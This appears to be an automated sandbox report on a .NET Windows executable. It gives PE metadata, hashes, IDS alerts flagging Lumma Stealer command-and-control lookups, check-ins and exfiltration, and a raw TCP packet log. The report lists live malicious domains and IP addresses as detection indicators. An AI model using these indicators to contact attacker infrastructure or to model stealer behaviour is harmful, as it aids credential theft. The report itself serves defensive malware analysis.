TLSH:	41367BAAFEC1CEA7C568127A66B7514897B6E4EC4726EBC3464D73341E033D22DF4212
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...W.ng.................\|M...........M.. ........@.. ........................N......1/...`................................

File Icon


Icon Hash:	0c0c2d33ceec80aa

Static PE Info

General

Entrypoint:	0x8d9b9e
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x676EFC57 [Fri Dec 27 19:13:27 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid:
Signature Issuer:
Signature Validation Error:
Error Number:
Not Before, Not After
Subject Chain
Version:
Thumbprint MD5:
Thumbprint SHA-1:
Thumbprint SHA-256:
Serial:

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x4d9b44	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4da000	0xe200	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x4e6200	0x2ea0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x4ea000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0x4d7ba4	0x4d7c00	e817b486f674c5918b694cfaebed1ce3	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0x4da000	0xe200	0xe200	499de16fbcef372bf243f3180cddd3d4	False	0.1611587389380531	data	3.3471153489955863	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x4ea000	0xc	0x200	6cd905b8a8a568c27c97e3708076209f	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0x4da370	0xa68	Device independent bitmap graphic, 64 x 128 x 4, image size 2048	0.1174924924924925
RT_ICON	0x4dadd8	0x668	Device independent bitmap graphic, 48 x 96 x 4, image size 1152	0.15792682926829268
RT_ICON	0x4db440	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512	0.23387096774193547
RT_ICON	0x4db728	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128	0.39864864864864863
RT_ICON	0x4db850	0x1628	Device independent bitmap graphic, 64 x 128 x 8, image size 4096, 256 important colors	0.08339210155148095
RT_ICON	0x4dce78	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	0.1023454157782516
RT_ICON	0x4ddd20	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.10649819494584838
RT_ICON	0x4de5c8	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.10838150289017341
RT_ICON	0x4deb30	0x12e5	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	0.8712011577424024
RT_ICON	0x4dfe18	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16896	0.05668398677373642
RT_ICON	0x4e4040	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	0.08475103734439834
RT_ICON	0x4e65e8	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	0.09920262664165103
RT_ICON	0x4e7690	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	0.2047872340425532
RT_GROUP_ICON	0x4e7af8	0xbc	data	0.6170212765957447
RT_VERSION	0x4e7bb4	0x2fc	data	0.43717277486910994
RT_MANIFEST	0x4e7eb0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-31T08:16:57.264869+0100	2058614	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (justyffyr .click)	1	192.168.2.4	63242	1.1.1.1	53	UDP
2024-12-31T08:16:58.294702+0100	2058514	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wordyfindy .lat)	1	192.168.2.4	63726	1.1.1.1	53	UDP
2024-12-31T08:16:58.332626+0100	2058502	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (slipperyloo .lat)	1	192.168.2.4	49566	1.1.1.1	53	UDP
2024-12-31T08:16:58.344235+0100	2058492	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (manyrestro .lat)	1	192.168.2.4	62830	1.1.1.1	53	UDP
2024-12-31T08:16:58.354648+0100	2058500	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (shapestickyr .lat)	1	192.168.2.4	50967	1.1.1.1	53	UDP
2024-12-31T08:16:58.403423+0100	2058510	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (talkynicer .lat)	1	192.168.2.4	59596	1.1.1.1	53	UDP
2024-12-31T08:16:58.415781+0100	2058484	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (curverpluch .lat)	1	192.168.2.4	61574	1.1.1.1	53	UDP
2024-12-31T08:16:58.425775+0100	2058512	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tentabatte .lat)	1	192.168.2.4	56480	1.1.1.1	53	UDP
2024-12-31T08:16:58.451780+0100	2058480	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bashfulacid .lat)	1	192.168.2.4	55027	1.1.1.1	53	UDP
2024-12-31T08:16:59.212413+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49730	104.102.49.254	443	TCP
2024-12-31T08:16:59.732242+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.4	49730	104.102.49.254	443	TCP
2024-12-31T08:17:00.303204+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-31T08:17:00.751841+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-31T08:17:00.751841+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49731	172.67.157.254	443	TCP
2024-12-31T08:17:01.216272+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-31T08:17:01.690112+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-31T08:17:01.690112+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49732	172.67.157.254	443	TCP
2024-12-31T08:17:02.367366+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49733	172.67.157.254	443	TCP
2024-12-31T08:17:03.461424+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49734	172.67.157.254	443	TCP
2024-12-31T08:17:03.923655+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.4	49734	172.67.157.254	443	TCP
2024-12-31T08:17:04.941363+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49735	172.67.157.254	443	TCP
2024-12-31T08:17:06.997816+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49736	172.67.157.254	443	TCP
2024-12-31T08:17:08.210286+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49737	172.67.157.254	443	TCP
2024-12-31T08:17:10.178847+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.4	49738	172.67.157.254	443	TCP
2024-12-31T08:17:10.636111+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.4	49738	172.67.157.254	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 08:16:58.553050041 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:58.553096056 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:58.553211927 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:58.558017969 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:58.558037043 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.212344885 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.212413073 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.214802027 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.214811087 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.215245008 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.262178898 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.282057047 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.323333025 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732287884 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732311964 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732350111 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732368946 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732378006 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.732391119 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732403994 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.732414961 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.732445955 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.819123030 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.819145918 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.819216967 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.819228888 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.819248915 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.819272995 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.824273109 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.824335098 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.824341059 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.824362993 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.824402094 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.825244904 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.825261116 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.825618982 CET	49730	443	192.168.2.4	104.102.49.254
Dec 31, 2024 08:16:59.825625896 CET	443	49730	104.102.49.254	192.168.2.4
Dec 31, 2024 08:16:59.839289904 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:16:59.839323997 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:16:59.839423895 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:16:59.839649916 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:16:59.839664936 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.303030968 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.303204060 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.306705952 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.306720018 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.307116032 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.308401108 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.308420897 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.308486938 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.751866102 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.751965046 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.752012968 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.752156973 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.752177000 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.752187967 CET	49731	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.752193928 CET	443	49731	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.758387089 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.758436918 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:00.758521080 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.758749008 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:00.758765936 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.216181040 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.216272116 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.223572016 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.223589897 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.223891973 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.235908031 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.235934019 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.235986948 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690129042 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690167904 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690202951 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690213919 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.690243959 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690289974 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.690293074 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690304041 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690349102 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690350056 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.690359116 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690395117 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.690402031 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690864086 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690891027 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690911055 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.690920115 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.690963030 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.694798946 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.746563911 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.776650906 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.776802063 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.776824951 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.776846886 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.776864052 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.776911020 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.776920080 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.776954889 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.777070045 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.777082920 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.777093887 CET	49732	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.777098894 CET	443	49732	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.900470018 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.900506020 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:01.900576115 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.901103973 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:01.901117086 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.367290020 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.367366076 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.368621111 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.368633032 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.368870020 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.370032072 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.370157003 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.370187044 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.370260954 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.370269060 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.958935022 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.959002972 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.959079027 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.959233046 CET	49733	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.959253073 CET	443	49733	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.976654053 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.976690054 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:02.976787090 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.977036953 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:02.977051973 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.461245060 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.461424112 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:03.462517023 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:03.462529898 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.462744951 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.463874102 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:03.463958025 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:03.463989973 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.923652887 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.923737049 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:03.923804045 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.149492979 CET	49734	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.149529934 CET	443	49734	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.373075962 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.373115063 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.373178959 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.373931885 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.373944998 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.941168070 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.941363096 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.942553997 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.942564011 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.942759991 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.944000006 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.944130898 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.944159985 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:04.944216013 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:04.944225073 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.388107061 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.388195038 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.388254881 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.388616085 CET	49735	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.388629913 CET	443	49735	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.531151056 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.531191111 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.531258106 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.531809092 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.531824112 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.997715950 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.997816086 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.999099970 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:06.999109030 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:06.999308109 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:07.000579119 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.000675917 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.000680923 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:07.414485931 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:07.414560080 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:07.414613962 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.414751053 CET	49736	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.414767027 CET	443	49736	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:07.722518921 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.722558022 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:07.722651958 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.723081112 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:07.723098040 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.210186005 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.210285902 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.211432934 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.211441994 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.211671114 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.212779045 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.213536024 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.213571072 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.213664055 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.213702917 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.213826895 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.213898897 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.214029074 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214062929 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.214194059 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214231968 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.214365005 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214396000 CET	443	49737	172.67.157.254	192.168.2.4
Dec 31, 2024 08:17:08.214406013 CET	49737	443	192.168.2.4	172.67.157.254
Dec 31, 2024 08:17:08.214416981 CET	443	49737	172.67.157.254	192.168.2.4
